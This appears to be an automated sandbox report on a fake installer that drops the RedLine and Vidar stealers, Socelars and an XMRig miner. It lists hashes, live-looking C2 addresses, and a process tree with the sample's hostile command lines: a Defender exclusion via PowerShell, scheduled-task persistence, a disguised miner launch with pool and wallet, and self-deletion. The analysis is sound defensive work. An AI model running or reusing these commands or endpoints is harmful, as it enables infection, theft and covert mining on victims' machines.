Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
linux_amd64
Analysis
-
max time kernel
63s -
max time network
1837s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
11-09-2021 09:47
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
Behavioral task
behavioral11
Sample
setup_x86_x64_install.exe
Resource
ubuntu-amd64
General
-
Target
setup_x86_x64_install.exe
-
Size
4.4MB
-
MD5
65eed0fdbee8b81c1b9118f86700c6fd
-
SHA1
fcca1e88a99e2f20403e963b798e3f68f58d638d
-
SHA256
3cf08993fa4866df41dc37cec849e5a5e9d0bcb6ea6660c30130d9e2fd2f623d
-
SHA512
f4c88eea9b410ea353ca9dc10c97dcfb360f9ef115d17eca1f12a4a702bc0b787cf48bfb2e6d993b8ad64ff4a0f9a2165d70eb1ae7b48652a3f5d8862543b3ac
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
redline
pab123
45.14.49.169:22411
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2844 1384 rundll32.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2572 1252 rUNdlL32.eXe 107 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral3/memory/1608-220-0x0000000004760000-0x000000000477F000-memory.dmp family_redline behavioral3/memory/1608-225-0x00000000047D0000-0x00000000047EE000-memory.dmp family_redline behavioral3/memory/2784-347-0x000000000041C5DE-mapping.dmp family_redline -
Socelars Payload 3 IoCs
resource yara_rule behavioral3/files/0x00030000000130db-130.dat family_socelars behavioral3/files/0x00030000000130db-123.dat family_socelars behavioral3/files/0x00030000000130db-113.dat family_socelars -
Vidar Stealer 1 IoCs
resource yara_rule behavioral3/memory/1588-208-0x0000000000400000-0x00000000021B7000-memory.dmp family_vidar -
XMRig Miner Payload 1 IoCs
resource yara_rule behavioral3/memory/2832-306-0x00000001402F327C-mapping.dmp xmrig -
resource yara_rule behavioral3/files/0x00030000000130dd-76.dat aspack_v212_v242 behavioral3/files/0x00030000000130dd-77.dat aspack_v212_v242 behavioral3/files/0x00030000000130dc-78.dat aspack_v212_v242 behavioral3/files/0x00030000000130dc-79.dat aspack_v212_v242 behavioral3/files/0x00030000000130df-82.dat aspack_v212_v242 behavioral3/files/0x00030000000130df-83.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 16 IoCs
pid Process 1436 setup_installer.exe 1020 setup_install.exe 952 Fri19d30056588.exe 1764 Fri192b9eeaa03b.exe 1656 Fri192c305b4a.exe 648 Fri19b9b73e83c948b1d.exe 568 Fri1921f7a9d3.exe 1596 Fri195cd4dbfdf37897.exe 1588 Fri192902b3c24.exe 1608 Fri19927b4fe38a9d1.exe 1264 Fri192f077acf656dd.exe 564 Fri19870e2febf5544.exe 2044 Fri19ca03f05489b.exe 968 Fri195cd4dbfdf37897.tmp 2076 Setup.exe 2152 Chrome 5.exe -
Loads dropped DLL 45 IoCs
pid Process 1812 setup_x86_x64_install.exe 1436 setup_installer.exe 1436 setup_installer.exe 1436 setup_installer.exe 1436 setup_installer.exe 1436 setup_installer.exe 1436 setup_installer.exe 1020 setup_install.exe 1020 setup_install.exe 1020 setup_install.exe 1020 setup_install.exe 1020 setup_install.exe 1020 setup_install.exe 1020 setup_install.exe 1020 setup_install.exe 432 cmd.exe 1140 cmd.exe 240 cmd.exe 384 cmd.exe 904 cmd.exe 904 cmd.exe 1652 cmd.exe 1652 cmd.exe 964 cmd.exe 1596 Fri195cd4dbfdf37897.exe 1596 Fri195cd4dbfdf37897.exe 1588 Fri192902b3c24.exe 1588 Fri192902b3c24.exe 1488 cmd.exe 1488 cmd.exe 740 cmd.exe 1628 cmd.exe 1592 cmd.exe 1592 cmd.exe 1608 Fri19927b4fe38a9d1.exe 1608 Fri19927b4fe38a9d1.exe 1264 Fri192f077acf656dd.exe 1264 Fri192f077acf656dd.exe 1596 Fri195cd4dbfdf37897.exe 968 Fri195cd4dbfdf37897.tmp 968 Fri195cd4dbfdf37897.tmp 968 Fri195cd4dbfdf37897.tmp 968 Fri195cd4dbfdf37897.tmp 2076 Setup.exe 1264 Fri192f077acf656dd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2699 whatismyip.akamai.com 12 ipinfo.io 84 ipinfo.io 175 freegeoip.app 2586 ip-api.com 176 freegeoip.app 178 freegeoip.app 412 ipinfo.io 8 ipinfo.io 9 ip-api.com 86 ipinfo.io 125 freegeoip.app -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
pid pid_target Process procid_target 2588 2428 WerFault.exe 65 2788 2488 WerFault.exe 66 2864 2260 WerFault.exe 63 2904 1588 WerFault.exe 44 2916 2640 WerFault.exe 70 3000 2564 WerFault.exe 69 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2188 schtasks.exe 2948 schtasks.exe 5968 schtasks.exe 864 schtasks.exe -
Kills process with taskkill 3 IoCs
pid Process 2256 taskkill.exe 3056 taskkill.exe 1780 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C Fri195cd4dbfdf37897.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Fri195cd4dbfdf37897.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Fri195cd4dbfdf37897.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e210f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Fri195cd4dbfdf37897.tmp -
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 413 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 85 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 968 Fri195cd4dbfdf37897.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1812 wrote to memory of 1436 1812 setup_x86_x64_install.exe 29 PID 1812 wrote to memory of 1436 1812 setup_x86_x64_install.exe 29 PID 1812 wrote to memory of 1436 1812 setup_x86_x64_install.exe 29 PID 1812 wrote to memory of 1436 1812 setup_x86_x64_install.exe 29 PID 1812 wrote to memory of 1436 1812 setup_x86_x64_install.exe 29 PID 1812 wrote to memory of 1436 1812 setup_x86_x64_install.exe 29 PID 1812 wrote to memory of 1436 1812 setup_x86_x64_install.exe 29 PID 1436 wrote to memory of 1020 1436 setup_installer.exe 30 PID 1436 wrote to memory of 1020 1436 setup_installer.exe 30 PID 1436 wrote to memory of 1020 1436 setup_installer.exe 30 PID 1436 wrote to memory of 1020 1436 setup_installer.exe 30 PID 1436 wrote to memory of 1020 1436 setup_installer.exe 30 PID 1436 wrote to memory of 1020 1436 setup_installer.exe 30 PID 1436 wrote to memory of 1020 1436 setup_installer.exe 30 PID 1020 wrote to memory of 1060 1020 setup_install.exe 32 PID 1020 wrote to memory of 1060 1020 setup_install.exe 32 PID 1020 wrote to memory of 1060 1020 setup_install.exe 32 PID 1020 wrote to memory of 1060 1020 setup_install.exe 32 PID 1020 wrote to memory of 1060 1020 setup_install.exe 32 PID 1020 wrote to memory of 1060 1020 setup_install.exe 32 PID 1020 wrote to memory of 1060 1020 setup_install.exe 32 PID 1020 wrote to memory of 384 1020 setup_install.exe 33 PID 1020 wrote to memory of 384 1020 setup_install.exe 33 PID 1020 wrote to memory of 384 1020 setup_install.exe 33 PID 1020 wrote to memory of 384 1020 setup_install.exe 33 PID 1020 wrote to memory of 384 1020 setup_install.exe 33 PID 1020 wrote to memory of 384 1020 setup_install.exe 33 PID 1020 wrote to memory of 384 1020 setup_install.exe 33 PID 1020 wrote to memory of 432 1020 setup_install.exe 34 PID 1020 wrote to memory of 432 1020 setup_install.exe 34 PID 1020 wrote to memory of 432 1020 setup_install.exe 34 PID 1020 wrote to memory of 432 1020 setup_install.exe 34 PID 1020 wrote to memory of 432 1020 setup_install.exe 34 PID 1020 wrote to memory of 432 1020 setup_install.exe 34 PID 1020 wrote to memory of 432 1020 setup_install.exe 34 PID 1020 wrote to memory of 1472 1020 setup_install.exe 35 PID 1020 wrote to memory of 1472 1020 setup_install.exe 35 PID 1020 wrote to memory of 1472 1020 setup_install.exe 35 PID 1020 wrote to memory of 1472 1020 setup_install.exe 35 PID 1020 wrote to memory of 1472 1020 setup_install.exe 35 PID 1020 wrote to memory of 1472 1020 setup_install.exe 35 PID 1020 wrote to memory of 1472 1020 setup_install.exe 35 PID 1020 wrote to memory of 240 1020 setup_install.exe 36 PID 1020 wrote to memory of 240 1020 setup_install.exe 36 PID 1020 wrote to memory of 240 1020 setup_install.exe 36 PID 1020 wrote to memory of 240 1020 setup_install.exe 36 PID 1020 wrote to memory of 240 1020 setup_install.exe 36 PID 1020 wrote to memory of 240 1020 setup_install.exe 36 PID 1020 wrote to memory of 240 1020 setup_install.exe 36 PID 1060 wrote to memory of 780 1060 cmd.exe 37 PID 1060 wrote to memory of 780 1060 cmd.exe 37 PID 1060 wrote to memory of 780 1060 cmd.exe 37 PID 1060 wrote to memory of 780 1060 cmd.exe 37 PID 1060 wrote to memory of 780 1060 cmd.exe 37 PID 1060 wrote to memory of 780 1060 cmd.exe 37 PID 1060 wrote to memory of 780 1060 cmd.exe 37 PID 1020 wrote to memory of 1652 1020 setup_install.exe 38 PID 1020 wrote to memory of 1652 1020 setup_install.exe 38 PID 1020 wrote to memory of 1652 1020 setup_install.exe 38 PID 1020 wrote to memory of 1652 1020 setup_install.exe 38 PID 1020 wrote to memory of 1652 1020 setup_install.exe 38 PID 1020 wrote to memory of 1652 1020 setup_install.exe 38 PID 1020 wrote to memory of 1652 1020 setup_install.exe 38 PID 1020 wrote to memory of 1140 1020 setup_install.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192c305b4a.exe4⤵
- Loads dropped DLL
PID:384 -
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri192c305b4a.exeFri192c305b4a.exe5⤵
- Executes dropped EXE
PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192b9eeaa03b.exe4⤵
- Loads dropped DLL
PID:432 -
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri192b9eeaa03b.exeFri192b9eeaa03b.exe5⤵
- Executes dropped EXE
PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri191454c4b4.exe4⤵PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri195cd4dbfdf37897.exe4⤵
- Loads dropped DLL
PID:240 -
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri195cd4dbfdf37897.exeFri195cd4dbfdf37897.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192902b3c24.exe4⤵
- Loads dropped DLL
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri192902b3c24.exeFri192902b3c24.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 9846⤵
- Program crash
PID:2904
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19d30056588.exe4⤵
- Loads dropped DLL
PID:1140 -
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri19d30056588.exeFri19d30056588.exe5⤵
- Executes dropped EXE
PID:952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1921f7a9d3.exe4⤵
- Loads dropped DLL
PID:964 -
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri1921f7a9d3.exeFri1921f7a9d3.exe5⤵
- Executes dropped EXE
PID:568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192f077acf656dd.exe4⤵
- Loads dropped DLL
PID:740 -
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri192f077acf656dd.exeFri192f077acf656dd.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1264 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"6⤵
- Executes dropped EXE
PID:2152 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit7⤵PID:1996
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'8⤵
- Creates scheduled task(s)
PID:2188
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"7⤵PID:2312
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:2844
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2948
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵PID:2020
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth8⤵PID:2832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"6⤵PID:2204
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"6⤵PID:2260
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2260 -s 13967⤵
- Program crash
PID:2864
-
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"6⤵PID:2312
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:2440
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "LzmwAqmV.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" & exit8⤵PID:2988
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"6⤵PID:2428
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2428 -s 8647⤵
- Program crash
PID:2588
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"6⤵PID:2488
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2488 -s 8887⤵
- Program crash
PID:2788
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"6⤵PID:2564
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2564 -s 13687⤵
- Program crash
PID:3000
-
-
-
C:\Users\Admin\AppData\Local\Temp\7.exe"C:\Users\Admin\AppData\Local\Temp\7.exe"6⤵PID:2640
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2640 -s 8887⤵
- Program crash
PID:2916
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"6⤵PID:2704
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19927b4fe38a9d1.exe4⤵
- Loads dropped DLL
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri19927b4fe38a9d1.exeFri19927b4fe38a9d1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19ca03f05489b.exe4⤵
- Loads dropped DLL
PID:1628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19870e2febf5544.exe4⤵
- Loads dropped DLL
PID:1592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19b9b73e83c948b1d.exe /mixone4⤵
- Loads dropped DLL
PID:904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri19b9b73e83c948b1d.exeFri19b9b73e83c948b1d.exe /mixone1⤵
- Executes dropped EXE
PID:648
-
C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri19870e2febf5544.exeFri19870e2febf5544.exe1⤵
- Executes dropped EXE
PID:564
-
C:\Users\Admin\AppData\Local\Temp\is-TUAI8.tmp\Fri195cd4dbfdf37897.tmp"C:\Users\Admin\AppData\Local\Temp\is-TUAI8.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$4012E,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri195cd4dbfdf37897.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
